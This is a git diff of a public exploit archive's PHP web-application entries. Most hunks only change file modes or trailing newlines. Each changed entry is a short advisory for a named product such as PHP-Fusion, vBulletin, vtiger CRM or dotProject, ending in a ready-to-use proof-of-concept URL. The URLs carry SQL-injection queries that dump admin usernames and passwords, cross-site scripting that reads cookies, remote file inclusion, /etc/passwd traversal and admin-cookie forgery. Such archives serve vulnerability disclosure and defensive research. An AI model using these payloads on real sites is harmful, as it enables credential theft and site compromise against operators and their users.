http://www.example.com/links.php?_SERVER[DOCUMENT_ROOT]=http://www.example2.com -http://www.example.com/links.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.example2.com \ No newline at end of file +http://www.example.com/links.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32218.txt b/platforms/php/webapps/32218.txt old mode 100755 new mode 100644 index a78483c25..fd101f46e --- a/platforms/php/webapps/32218.txt +++ b/platforms/php/webapps/32218.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow GooCMS 1.02 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?task=comments&s=>?><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/index.php?task=comments&s=>?><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/32219.txt b/platforms/php/webapps/32219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3222.txt b/platforms/php/webapps/3222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32220.txt b/platforms/php/webapps/32220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32221.txt b/platforms/php/webapps/32221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32226.txt b/platforms/php/webapps/32226.txt old mode 100755 new mode 100644 index f295d21b2..5fd49bd2b --- a/platforms/php/webapps/32226.txt +++ b/platforms/php/webapps/32226.txt @@ -4,4 +4,4 @@ Datafeed Studio is prone to a remote file-include vulnerability because it fails An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/admin/bin/patch.php?INSTALL_FOLDER=[Evilc0dE] \ No newline at end of file +http://www.example.com/admin/bin/patch.php?INSTALL_FOLDER=[Evilc0dE] \ No newline at end of file diff --git a/platforms/php/webapps/32227.txt b/platforms/php/webapps/32227.txt old mode 100755 new mode 100644 index 90044fc3c..74159e78a --- a/platforms/php/webapps/32227.txt +++ b/platforms/php/webapps/32227.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Datafeed Studio 1.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?q="><script>alert("XSS")</script> \ No newline at end of file +http://www.example.com/search.php?q="><script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/php/webapps/32230.txt b/platforms/php/webapps/32230.txt old mode 100755 new mode 100644 index 8d746fefe..29efd6ca3 --- a/platforms/php/webapps/32230.txt +++ b/platforms/php/webapps/32230.txt @@ -11,4 +11,4 @@ http://www.example.com/index.php?page=user_add&catid=[XSS] http://www.example.com/index.php?page=recip&catid=[XSS] http://www.example.com/index.php?page=tellafriend&catid=[XSS] http://www.example.com/index.php?page=contact&catid=[XSS] -http://www.example.com/index.php?page=tellafriend&id=[XSS] \ No newline at end of file +http://www.example.com/index.php?page=tellafriend&id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32231.txt b/platforms/php/webapps/32231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32232.txt b/platforms/php/webapps/32232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32233.txt b/platforms/php/webapps/32233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32234.txt b/platforms/php/webapps/32234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32235.txt b/platforms/php/webapps/32235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32236.txt b/platforms/php/webapps/32236.txt old mode 100755 new mode 100644 index 800cfd98f..a5a0355bc --- a/platforms/php/webapps/32236.txt +++ b/platforms/php/webapps/32236.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and Meet#Web 0.8 is vulnerable; other versions may also be affected. -http://www.example.com/cms/meetweb/classes/RegRightsResource.class.php?root_path=[SHell] \ No newline at end of file +http://www.example.com/cms/meetweb/classes/RegRightsResource.class.php?root_path=[SHell] \ No newline at end of file diff --git a/platforms/php/webapps/32239.txt b/platforms/php/webapps/32239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32240.txt b/platforms/php/webapps/32240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32241.txt b/platforms/php/webapps/32241.txt old mode 100755 new mode 100644 index 673d5d346..fa7b733d0 --- a/platforms/php/webapps/32241.txt +++ b/platforms/php/webapps/32241.txt @@ -5,4 +5,4 @@ PHP Realty is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin-- -http://www.example.com/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin-- \ No newline at end of file +http://www.example.com/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/32242.txt b/platforms/php/webapps/32242.txt old mode 100755 new mode 100644 index 354899975..d3296a305 --- a/platforms/php/webapps/32242.txt +++ b/platforms/php/webapps/32242.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc PHP-Fusion 4.01 is vulnerable; other versions may also be affected. -http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/* \ No newline at end of file +http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/* \ No newline at end of file diff --git a/platforms/php/webapps/32243.txt b/platforms/php/webapps/32243.txt old mode 100755 new mode 100644 index d55293416..2b86f5a54 --- a/platforms/php/webapps/32243.txt +++ b/platforms/php/webapps/32243.txt @@ -6,4 +6,4 @@ Attackers can exploit this vulnerability to gain administrative access to the af Nukeviet 2.0 Beta is vulnerable; other versions may also be affected. -javascript:document.cookie = "admf=1; path=/"; \ No newline at end of file +javascript:document.cookie = "admf=1; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32244.txt b/platforms/php/webapps/32244.txt old mode 100755 new mode 100644 index ddf44feb5..89f9abd8e --- a/platforms/php/webapps/32244.txt +++ b/platforms/php/webapps/32244.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin YapBB 1.2 Beta2 is vulnerable; other versions may also be affected. -http://www.example.com/include/class_yapbbcooker.php?cfgIncludeDirectory=http://www.example2.com \ No newline at end of file +http://www.example.com/include/class_yapbbcooker.php?cfgIncludeDirectory=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32245.txt b/platforms/php/webapps/32245.txt old mode 100755 new mode 100644 index 6a242cb92..3a43d68e4 --- a/platforms/php/webapps/32245.txt +++ b/platforms/php/webapps/32245.txt @@ -6,4 +6,4 @@ An attacker can exploit the local file-include vulnerability using directory-tra Navboard 16 is vulnerable; other versions may also be affected. -http://www.example.com/path/modules.php?module=[XSS] \ No newline at end of file +http://www.example.com/path/modules.php?module=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32246.txt b/platforms/php/webapps/32246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32247.txt b/platforms/php/webapps/32247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32251.txt b/platforms/php/webapps/32251.txt old mode 100755 new mode 100644 index 9cfe2a65f..cf18d7d68 --- a/platforms/php/webapps/32251.txt +++ b/platforms/php/webapps/32251.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to PHPizabi 0.848b C1 HFP3 is vulnerable; other versions may also be affected. -http://www.example.com/phpizabi/index.php?L=admin.templates.edittemplate&id=../../../boot.ini \ No newline at end of file +http://www.example.com/phpizabi/index.php?L=admin.templates.edittemplate&id=../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/32252.txt b/platforms/php/webapps/32252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32253.txt b/platforms/php/webapps/32253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32254.txt b/platforms/php/webapps/32254.txt old mode 100755 new mode 100644 index 973da89c1..2d93c6588 --- a/platforms/php/webapps/32254.txt +++ b/platforms/php/webapps/32254.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FlexCMS 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32257.txt b/platforms/php/webapps/32257.txt old mode 100755 new mode 100644 index 2f8ec261c..8733f5644 --- a/platforms/php/webapps/32257.txt +++ b/platforms/php/webapps/32257.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user-- -http://www.example.com/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user-- \ No newline at end of file +http://www.example.com/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user-- \ No newline at end of file diff --git a/platforms/php/webapps/32259.txt b/platforms/php/webapps/32259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3226.txt b/platforms/php/webapps/3226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32263.txt b/platforms/php/webapps/32263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32264.txt b/platforms/php/webapps/32264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32265.txt b/platforms/php/webapps/32265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32266.txt b/platforms/php/webapps/32266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32267.txt b/platforms/php/webapps/32267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32268.txt b/platforms/php/webapps/32268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32269.txt b/platforms/php/webapps/32269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3227.txt b/platforms/php/webapps/3227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32270.txt b/platforms/php/webapps/32270.txt old mode 100755 new mode 100644 index 3b14e1c29..6dcae77b2 --- a/platforms/php/webapps/32270.txt +++ b/platforms/php/webapps/32270.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities using directory-traversal strings Freeway 1.4.1.171 is vulnerable; other versions may also be affected. -http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32271.txt b/platforms/php/webapps/32271.txt old mode 100755 new mode 100644 index 3e9d39d5b..1ff8ed0ba --- a/platforms/php/webapps/32271.txt +++ b/platforms/php/webapps/32271.txt @@ -5,4 +5,4 @@ NewsHOWLER is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/"; -javascript:document.cookie = "news_password=3; path=/"; \ No newline at end of file +javascript:document.cookie = "news_password=3; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32272.txt b/platforms/php/webapps/32272.txt old mode 100755 new mode 100644 index 810781f38..5d77dc9ad --- a/platforms/php/webapps/32272.txt +++ b/platforms/php/webapps/32272.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Ovidentia 6.6.5 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script> \ No newline at end of file +http://www.example.com/[path]/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32274.txt b/platforms/php/webapps/32274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32275.txt b/platforms/php/webapps/32275.txt old mode 100755 new mode 100644 index 2b44d71d3..4bd7924c5 --- a/platforms/php/webapps/32275.txt +++ b/platforms/php/webapps/32275.txt @@ -18,4 +18,4 @@ http://www.example.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(c http://www.example.com/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin-- -http://www.example.com/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin-- \ No newline at end of file +http://www.example.com/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/32279.txt b/platforms/php/webapps/32279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3228.txt b/platforms/php/webapps/3228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32280.txt b/platforms/php/webapps/32280.txt old mode 100755 new mode 100644 index a0d3d0df7..678104345 --- a/platforms/php/webapps/32280.txt +++ b/platforms/php/webapps/32280.txt @@ -4,4 +4,4 @@ YourFreeWorld Ad-Exchange Script is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com.com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- \ No newline at end of file +http://www.example.com.com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- \ No newline at end of file diff --git a/platforms/php/webapps/32281.cs b/platforms/php/webapps/32281.cs old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32282.txt b/platforms/php/webapps/32282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32283.txt b/platforms/php/webapps/32283.txt old mode 100755 new mode 100644 index 241be5805..03c3895d9 --- a/platforms/php/webapps/32283.txt +++ b/platforms/php/webapps/32283.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc DXShopCart 4.30mc is vulnerable; other versions may also be affected. -http://www.example.com.com/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- \ No newline at end of file +http://www.example.com.com/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- \ No newline at end of file diff --git a/platforms/php/webapps/32284.txt b/platforms/php/webapps/32284.txt old mode 100755 new mode 100644 index 62c43ac73..5d32ecde2 --- a/platforms/php/webapps/32284.txt +++ b/platforms/php/webapps/32284.txt @@ -4,4 +4,4 @@ Simasy CMS is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com.com/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/* \ No newline at end of file +http://www.example.com.com/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/* \ No newline at end of file diff --git a/platforms/php/webapps/32285.txt b/platforms/php/webapps/32285.txt old mode 100755 new mode 100644 index f5b1f9598..12ad27bb9 --- a/platforms/php/webapps/32285.txt +++ b/platforms/php/webapps/32285.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected. ---></script><script>alert(/xss/.source)</script><!-- \ No newline at end of file +--></script><script>alert(/xss/.source)</script><!-- \ No newline at end of file diff --git a/platforms/php/webapps/32287.txt b/platforms/php/webapps/32287.txt old mode 100755 new mode 100644 index 52c5e33f5..d45bd2311 --- a/platforms/php/webapps/32287.txt +++ b/platforms/php/webapps/32287.txt @@ -4,4 +4,4 @@ FAR-PHP is prone to a local file-include vulnerability because it fails to prope An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. -http://www.example.com/farver/index.php?c=/../../../../../../../../boot.ini%00 \ No newline at end of file +http://www.example.com/farver/index.php?c=/../../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/32288.txt b/platforms/php/webapps/32288.txt old mode 100755 new mode 100644 index 2cdcb3b61..4834fbf45 --- a/platforms/php/webapps/32288.txt +++ b/platforms/php/webapps/32288.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br TimeTrex versions 2.2.12 and previous are vulnerable. http://www.example.com/interface/Login.php?user_name=admin&password=XSS -http://www.example.com/interface/Login.php?user_name=XSS \ No newline at end of file +http://www.example.com/interface/Login.php?user_name=XSS \ No newline at end of file diff --git a/platforms/php/webapps/32290.txt b/platforms/php/webapps/32290.txt old mode 100755 new mode 100644 index 2c115c1c4..bb57de8a4 --- a/platforms/php/webapps/32290.txt +++ b/platforms/php/webapps/32290.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Accellion File Transfer FTA_7_0_135 is vulnerable; prior versions may also be affected. -https://www.example.com/courier/forgot_password.html/>"><script>alert(document.cookie)</script> \ No newline at end of file +https://www.example.com/courier/forgot_password.html/>"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32291.txt b/platforms/php/webapps/32291.txt old mode 100755 new mode 100644 index 8b0780796..9596eb8f8 --- a/platforms/php/webapps/32291.txt +++ b/platforms/php/webapps/32291.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Photo Cart 3.9 is vulnerable; other versions may also be affected. -POST <script>alert(document.cookie)</script> to "Gallery or event name" field \ No newline at end of file +POST <script>alert(document.cookie)</script> to "Gallery or event name" field \ No newline at end of file diff --git a/platforms/php/webapps/32293.txt b/platforms/php/webapps/32293.txt old mode 100755 new mode 100644 index 533f6442a..79957fc55 --- a/platforms/php/webapps/32293.txt +++ b/platforms/php/webapps/32293.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Beta 2 of One-News is prone to these issues. -http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* \ No newline at end of file +http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* \ No newline at end of file diff --git a/platforms/php/webapps/32295.txt b/platforms/php/webapps/32295.txt old mode 100755 new mode 100644 index 3f2d40f40..b1f96a776 --- a/platforms/php/webapps/32295.txt +++ b/platforms/php/webapps/32295.txt @@ -6,4 +6,4 @@ Successful exploits will allow unauthorized attackers to delete arbitrary questi PHP-Ultimate Webboard 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM] \ No newline at end of file +http://www.example.com/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM] \ No newline at end of file diff --git a/platforms/php/webapps/32296.txt b/platforms/php/webapps/32296.txt old mode 100755 new mode 100644 index c32a27708..f464e5d1f --- a/platforms/php/webapps/32296.txt +++ b/platforms/php/webapps/32296.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PopnupBlog 3.30 is affected; other versions may also be vulnerable. -http://www.example.com/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE] \ No newline at end of file +http://www.example.com/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/32298.txt b/platforms/php/webapps/32298.txt old mode 100755 new mode 100644 index 41d6a577e..322d55570 --- a/platforms/php/webapps/32298.txt +++ b/platforms/php/webapps/32298.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script NOTE: This issue may stem from an incomplete fix for the issues discussed in BIDs 24256 (HP System Management Homepage (SMH) Unspecified Cross Site Scripting Vulnerability) and 25953 (HP System Management Homepage (SMH) for Linux, Windows, and HP-UX Cross Site Scripting Vulnerability), but Symantec has not confirmed this. -1st vector) https://www.example.com/message.php?<script><script>alert('xss')</script></script> 2nd vector) https://www.example.com/message.php?aa%00<script><script>alert('xss')</script></script> 3rd vector) https://www.example.com/message.php?aa<BGSOUND SRC="javascript:alert('XSS');"> \ No newline at end of file +1st vector) https://www.example.com/message.php?<script><script>alert('xss')</script></script> 2nd vector) https://www.example.com/message.php?aa%00<script><script>alert('xss')</script></script> 3rd vector) https://www.example.com/message.php?aa<BGSOUND SRC="javascript:alert('XSS');"> \ No newline at end of file diff --git a/platforms/php/webapps/32299.txt b/platforms/php/webapps/32299.txt old mode 100755 new mode 100644 index 0dc20b469..555b7c97c --- a/platforms/php/webapps/32299.txt +++ b/platforms/php/webapps/32299.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MatterDaddy Market 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/dir(s)/admin/login.php?msg=[XSS] \ No newline at end of file +http://www.example.com/dir(s)/admin/login.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32302.txt b/platforms/php/webapps/32302.txt old mode 100755 new mode 100644 index f3968e4be..4bda15b39 --- a/platforms/php/webapps/32302.txt +++ b/platforms/php/webapps/32302.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects AbleSpace 1.0 and earlier. -http://www.example.com/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0 \ No newline at end of file +http://www.example.com/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0 \ No newline at end of file diff --git a/platforms/php/webapps/32306.txt b/platforms/php/webapps/32306.txt old mode 100755 new mode 100644 index 4406cf688..47519c825 --- a/platforms/php/webapps/32306.txt +++ b/platforms/php/webapps/32306.txt @@ -8,4 +8,4 @@ Attackers may exploit the SQL-injection issue to compromise the application, acc dotProject 2.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?m=tasks&inactive=toggle"> http://www.example.com/index.php?m=calendar&a=day_view&date=20080828"> http://www.example.com/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> http://www.example.com/index.php?m=ticketsmith&type=My'> http://www.example.com/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users-- \ No newline at end of file +http://www.example.com/index.php?m=tasks&inactive=toggle"> http://www.example.com/index.php?m=calendar&a=day_view&date=20080828"> http://www.example.com/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> http://www.example.com/index.php?m=ticketsmith&type=My'> http://www.example.com/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users-- \ No newline at end of file diff --git a/platforms/php/webapps/32307.txt b/platforms/php/webapps/32307.txt old mode 100755 new mode 100644 index fa27373bb..01a90188e --- a/platforms/php/webapps/32307.txt +++ b/platforms/php/webapps/32307.txt @@ -8,4 +8,4 @@ vtiger CRM 5.0.4 is vulnerable; other versions may also be affected. http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script> http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script> -http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/32308.txt b/platforms/php/webapps/32308.txt old mode 100755 new mode 100644 index 54a9d1785..d0a17e771 --- a/platforms/php/webapps/32308.txt +++ b/platforms/php/webapps/32308.txt @@ -4,4 +4,4 @@ GenPortal is prone to a cross-site scripting vulnerability because it fails to s An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/buscarCat.php?palBuscar=[XSS] \ No newline at end of file +http://www.example.com/path/buscarCat.php?palBuscar=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32309.txt b/platforms/php/webapps/32309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3231.txt b/platforms/php/webapps/3231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32312.txt b/platforms/php/webapps/32312.txt old mode 100755 new mode 100644 index 439caafa7..f42810793 --- a/platforms/php/webapps/32312.txt +++ b/platforms/php/webapps/32312.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow BizDirectory 2.04 is vulnerable; other verisons may also be affected. -http://www.example.com/?page=[XsS]&mode=search \ No newline at end of file +http://www.example.com/?page=[XsS]&mode=search \ No newline at end of file diff --git a/platforms/php/webapps/32313.txt b/platforms/php/webapps/32313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32314.txt b/platforms/php/webapps/32314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32315.txt b/platforms/php/webapps/32315.txt old mode 100755 new mode 100644 index 80eff373e..03c5edfea --- a/platforms/php/webapps/32315.txt +++ b/platforms/php/webapps/32315.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br OpenDb 1.0.6 is vulnerable; other versions may also be affected. -http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie) \ No newline at end of file +http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/32316.txt b/platforms/php/webapps/32316.txt old mode 100755 new mode 100644 index 4aa39e70b..aaec52eca --- a/platforms/php/webapps/32316.txt +++ b/platforms/php/webapps/32316.txt @@ -8,4 +8,4 @@ eliteCMS 1.0 and 1.01 are vulnerable; other versions may also be affected. http://www.example.com/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/* -http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* \ No newline at end of file +http://www.example.com/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* \ No newline at end of file diff --git a/platforms/php/webapps/32317.txt b/platforms/php/webapps/32317.txt old mode 100755 new mode 100644 index 4b08abed0..52f5af449 --- a/platforms/php/webapps/32317.txt +++ b/platforms/php/webapps/32317.txt @@ -11,4 +11,4 @@ These issues affect the following versions: Other versions running on different platforms may also be affected. -http://www.example.com/parse.php?file="><img/src/onerror=alert(document.cookie)> http://www.example.com/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' http://www.example.com/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' http://www.example.com/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 http://www.example.com/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie) \ No newline at end of file +http://www.example.com/parse.php?file="><img/src/onerror=alert(document.cookie)> http://www.example.com/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo=' 